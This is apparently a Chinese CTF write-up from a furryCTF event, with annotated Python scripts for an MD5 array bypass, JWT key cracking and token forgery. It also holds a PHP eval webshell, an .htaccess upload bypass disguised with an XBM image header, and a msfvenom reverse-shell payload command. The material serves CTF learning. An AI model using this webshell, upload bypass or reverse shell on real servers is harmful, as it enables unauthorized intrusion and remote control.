依旧中译中,大佬说py代码会降低复现失败的概率

Ezmd5

值不能相等,但是md5值要强相等,数组绕过

弱相等的用0e绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import requests
import re # 用于从网页返回的文本中匹配、提取符合特定格式的字符串

url="http://ctf.furryctf.com:32838/"
data={
    "user[]":"1",
    "pass[]":"2"
}

r = requests.post(url,data=data) #发送 POST 请求,并将响应结果赋值给变量 r。
#data=data:将字典 data 作为表单数据提交(Content-Type 默认为 application/x-www-form-urlencoded)。
#变量 r:包含响应的所有信息(如状态码、响应文本、响应头等)。

match = re.search(r"POFP\{.*?}",r.text)
#re.search(搜索关键字,要搜索的文本),匹配不到就返回none
#{特殊字符,前面加\转义
# .*? 非贪婪匹配任意字符
# . 匹配除了换行符之外的任意字符,也就是匹配{后的第一个字符
# * 量词,在}之前有多少匹配多少
# ? 转换为非贪婪模式,也就是说在第一个}出现后就停止

if match:#判断match是否非空
    print(match.group())

admin

纯爆破,我怎么知道刚好有有四个字符,还刚好是小写

题目描述说“不小心把管理员的账号给删了”,我理解成把管理员账号从数据库中删了,所以就没往爆破方向想了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import itertools #生成爆破字典都用它
import string #string 模块提供了很多预设的字符串常量,避免我们手动输入(比如所有小写字母、大写字母、数字等

letters = string.ascii_lowercase
#定义变量letter,存储所有小写字母的字符串
# 存储"abcdefghijklmnopqrstuvwxyz"

with open("4字符小写.txt","w") as f:
    #以写入模式打开或新建文件,并将这整个文件赋值给变量f
    for combo in itertools.product(letters,repeat=4):
        #itertools.product(重复对象,重复次数),等价于itertools.product(对象,对象,对象,对象)
        #生成的combo是一个元组,比如第一个组合是 ('a','a','a','a'),第二个是 ('a','a','a','b'),直到最后一个 ('z','z','z','z');
        f.write("".join(combo) + "\n")
        #"".join(combo):将元组 combo 中的字符拼接成一个完整的字符串。比如 combo=('a','a','a','a') 时,join 后得到 "aaaa";
        #f.write(...):将拼接好的字符串(带换行符)写入文件 f 中。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
F:\cry\jwt_tool-2.3.0>python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoidXNlciIsImlhdCI6MTc3MDQzMDAzNCwiZXhwIjoxNzcwNDMzNjM0fQ.XQU09R7Znhp-S0TUZqLguZAtDwsK1Jz5Zarkk_rrbLo -C -d 4字符小写.txt

        \   \        \         \          \                    \
   \__   |   |  \     |\__    __| \__    __|                    |
         |   |   \    |      |          |       \         \     |
         |        \   |      |          |    __  \     __  \    |
  \      |      _     |      |          |   |     |   |     |   |
   |     |     / \    |      |          |   |     |   |     |   |
\        |    /   \   |      |          |\        |\        |   |
 \______/ \__/     \__|   \__|      \__| \______/  \______/ \__|
 Version 2.3.0                \______|             @ticarpi

C:\Users\User/.jwt_tool/jwtconf.ini
Original JWT:

[+] mwkj is the CORRECT key!
You can tamper/fuzz the token contents (-T/-I) and sign it using:
python3 jwt_tool.py [options here] -S hs256 -p "mwkj"

-C 全称 --crack,表示启动 JWT 签名密钥的爆破模式

-d 全称 --dictionary,表示 “指定爆破使用的字典文件”,后面必须跟字典文件的路径 / 名称。

1
2
3
4
5
Original JWT:

[+] mwkj is the CORRECT key!
You can tamper/fuzz the token contents (-T/-I) and sign it using:
python3 jwt_tool.py [options here] -S hs256 -p "mwkj"

发现不能发给repeater,因为中间还要通过一层vaildata.php鉴权,里面的post包里面就是要校验的token值,直接repeater发包返回“Failed to fetch”,就是跨域问题:前端页面和后端接口的域名 / 端口不一致,浏览器的跨域策略阻止了请求。

这题我用bp改get请求包一直失败,中间层还是原来的token值,但是浏览器直接改就会成功

所以写脚本

写脚本发现和repeater一样的效果

1
2
3
4
5
6
7
8
9
10
11
import requests
import re # 用于从网页返回的文本中匹配、提取符合特定格式的字符串

url="http://ctf.furryctf.com:32840/home/index.html"
data={
    "key":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJpYXQiOjE3NzA0MzAwMzQsImV4cCI6MTc3MDQzMzYzNH0.4nRgq-eee_urxL3-eMhFz0J61kn5wTe-VQvizEtfYjU"
}

r = requests.get(url,data=data)

print(r.text)

回显

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
<body>
<div class="container">
    <h1>用户主页</h1>
    <div id="content">
        <p>正在验证您的访问权限...</p>
    </div>
</div>

<script>
    const urlParams = new URLSearchParams(window.location.search);
//window.location.search:获取浏览器地址栏中?后面的查询字符串
//URLSearchParams:浏览器内置的 API,专门用于解析 URL 查询参数的工具类,能方便地获取、添加、删除参数;
    const token = urlParams.get('key');
//urlParams.get('key'):调用URLSearchParams的get方法,传入参数名key,返回该参数对应的值

    fetch('validate.php', {
        //fetch():浏览器内置的网络请求 API,用于替代传统的XMLHttpRequest,返回 Promise 对象;
        //Promise 是 JavaScript 中用于处理异步操作的对象
        //Promise 有且只有三种状态,状态一旦改变就不能再修改:
//Pending(进行中):初始状态,异步操作还没完成;
//Fulfilled(已成功):异步操作完成,得到了结果;
//Rejected(已失败):异步操作出错,得到了错误信息。
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ token })
    })
        .then(response => response.json())  
// then():Promise 的链式调用方法,fetch返回的 Promise 成功(网络请求完成,无论 HTTP 状态码是 200 还是 404/500)时执行这个回调;
//=>简单的函数写法,举个例子function(x) { return x + 1; }等价于x => x + 1
//这里就是接收response参数的内容,返回它json格式的内容
        .then(data => {
      //data:就是后端validate.php返回的 JSON 数据
            const contentDiv = document.getElementById('content');
//document.getElementById('content'):通过 ID 查找页面中的 DOM 节点,即找到id="content"的<div>元素
 //DOM节点:<div>,<p>,<button>,文本,属性等       
            if (data.stat === 200) {
                let html = `
            <div class="user-info">
                <h2>欢迎, ${data.user}!</h2>
                <p>登录时间: ${new Date(data.iat * 1000).toLocaleString()}</p>
                <p>过期时间: ${new Date(data.exp * 1000).toLocaleString()}</p>`;

                if (data.flag) {
                    html += `<div class="flag">flag:\n${data.flag}</div>`;
                }

                html += `</div><p>您已成功通过身份验证。</p>`;
                contentDiv.innerHTML = html;
            } else {
                contentDiv.innerHTML = `
            <div class="error">
                <h2>访问被拒绝</h2>
                <p>原因: ${data.message}</p>
                <p>请<a href="../login.html">重新登录</a></p>
            </div>`;
            }
        })//闭合前面的第二个 .then() 方法
        .catch(error => {//若整个 fetch 请求过程中出现网络错误(比如断网、服务器宕机),则捕获错误并展示通用错误提示,同时在控制台打印详细错误。
            document.getElementById('content').innerHTML = `
        <div class="error">
            <h2>发生错误</h2>
            <p>${error.message}</p>
            <p>请检查浏览器控制台获取详细信息</p>
        </div>`;
            console.error('验证错误:', error);
        });
</script>
</body>
</html>

所以我前面repeater的理解不全,catch error触发的条件是我后端接口地址错误,是validata.php不是index/home;response.json()解析失败

问了ai说这时候要直接伪造validata的请求包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import requests
import re # 用于从网页返回的文本中匹配、提取符合特定格式的字符串

url="http://ctf.furryctf.com:32840/"
token="eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJpYXQiOjE3NzA0MzU3NDYsImV4cCI6MTc3MDQzOTM0Nn0.S8z0lw1IJ1Yz79usgEpCu5ewTB37eHv8KDx2Kssswb8"


r = requests.post(
    url+"/home/validate.php",
    json={"token":token}
    )

print(r.text)

match = re.search(r"furryCTF\{.*?}",r.text)


if match:
    print(match.group())

SSO Drive

又是卡到写马环节,补充知识短标签

1
<? @eval($_POST['a']);?>

试试昨天的重写htaccess

发现不行,被过滤了

查看过滤回显,第一层是“only images and config files allowed”说明要上传图片+htaccess

上传一个只改文件后缀为jpg和htaccess时又回显“the file is not a vaild image data”

但是上传一个真正图片后面凭借代码时又上传成功了,说明后端校验图片头

说明要加个图片头绕过

但是apache在解析到GIF89a时发现列表里面没有指令,抛出错误,终止解析

补充知识xbm图片头绕过

1
2
3
4
#define width 1   # XBM图片格式的标准开头,且以#开头,被Apache当作注释忽略
#define height 1   # XBM图片的尺寸定义,同样以#开头,不影响配置解析
AddType application/x-httpd-php .jpg   # 把.jpg后缀的文件解析为PHP文件
php_flag engine on     # 强制开启PHP引擎(确保解析生效)

成功蚁剑连接后发现flag文件里面没有半截flag,也没有start.sh,不会又要复现失败了吧

wp用msf写了一个反弹shell的马

1
sudo msfvenom -p linux/x64/shell_reverse_tcp LHOST=ip LPORT=port -f elf -o shell.elf

msfvenom:Metasploit 框架的载荷生成工具,是msfpayloadmsfencode的整合版,用于生成各种恶意载荷

-p(payload)指定要生成的载荷类型:

linux:目标系统为 Linux

x64:目标系统是 64 位架构

shell_reverse_tcp:反向 TCP Shell(核心功能),即让目标机器主动连接你的攻击机,建立交互式 Shell

LHOST=ip:指定kali IP 地址(需要替换成实际 IP),靶场会向这个 IP 发起反向连接

LPORT=port指定kali监听端口(需要替换成实际端口,如 4444),靶场会连接这个端口

-f elf :-f(format)指定输出文件格式为elf,这是 Linux 系统可执行文件的标准格式

-o shell.elf``-o(output)指定生成的文件保存为shell.elf,这是最终生成的恶意程序文件名

1
2
3
4
5
6
7
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: shell.elf

保存成功

反弹shell这一步又卡住了![img](file:///[凋谢]),如何上传shell.elf到题目里啊,我试了直接上传不行,改后缀名和mime格式后就解析成字符串了
imgimg
题目链接https://furryctf.com/games/2/challenges#149-SSO-Drive,wp链接https://dcntycecetdh.feishu.cn/wiki/W3m8wlCy4iDIqJkgCgjcGMzmnee

如有错误,多多指教

valine